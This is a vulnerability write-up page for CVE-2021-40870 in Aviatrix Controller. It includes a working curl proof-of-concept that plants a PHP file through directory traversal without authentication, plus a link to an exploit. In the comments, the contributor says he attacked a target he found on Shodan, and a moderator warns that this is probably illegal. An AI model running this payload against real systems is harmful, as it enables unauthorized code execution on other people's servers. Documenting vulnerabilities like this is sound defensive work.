Moderate
CVE-2021-40870
CVE-2021-40870
Description
An issue was discovered in Aviatrix Controller 6.x before 6.5-1804.1922. Unrestricted upload of a file with a dangerous type is possible, which allows an unauthenticated user to execute arbitrary code via directory traversal.
Add Assessment
Technical Analysis
Description
This Vulnerability allows an attacker to create and store file on the Aviatrix controller. Exploitation phase doesn’t need any user authentication , or doesn’t require any other users interaction , simply can be exploited using curl . Here is one example.
curl -k https://aviatrix.domain.tld/v1/backend1 -d CID=x -d action=set_metric_gw_selections -d account_name=/../../../var/www/php/poc.php -d 'data=hello<?php echo "Vulnerable Poc";?>' # after executing the previous command if the target is vulnerable this will create a php file on this path https://vulnerable.target.com/v1/poc
Attacker can do this unauthenticated because many API calls do not enforce a check for authentication. So this allows an unauthenticated attacker to upload arbitrary files, including .php scripts, to the filesystem .
Or You can Use This Exploit to do the exploition more easily : https://github.com/JoyGhoshs/CVE-2021-40870
CVSS V3 Severity and Metrics
General Information
Vendors
- aviatrix
Products
- controller
Exploited in the Wild
References
Hey @JoyGhoshs, great write-up, thanks! I was trying to find some kind of confirmation somewhere that this is exploited in the wild, though, and I’m not coming up with anything—have you observed active attacks by adversaries (not pen testers) against this somewhere, or were you reporting it as “Exploited in the wild” simply because details are available?
hey @ccondon-r7 , Yes i have performed active attack against a vulnerable target which i found on shodan by doing little search .
Thanks @JoyGhoshs. Assuming you were attacking a target that you had permission to attack, we would not consider that to be exploitation in the wild. (If you were attacking a target that you did not have permission to attack…well, we aren’t lawyers, but that’s a pretty bad idea and probably not legal!)
To be considered “in the wild,” exploitation generally needs to take place outside lab environments and not within pen testing engagements. In other words, we only mark things “exploited in the wild” when threat actors are exploiting vulnerable targets to achieve some type of objective.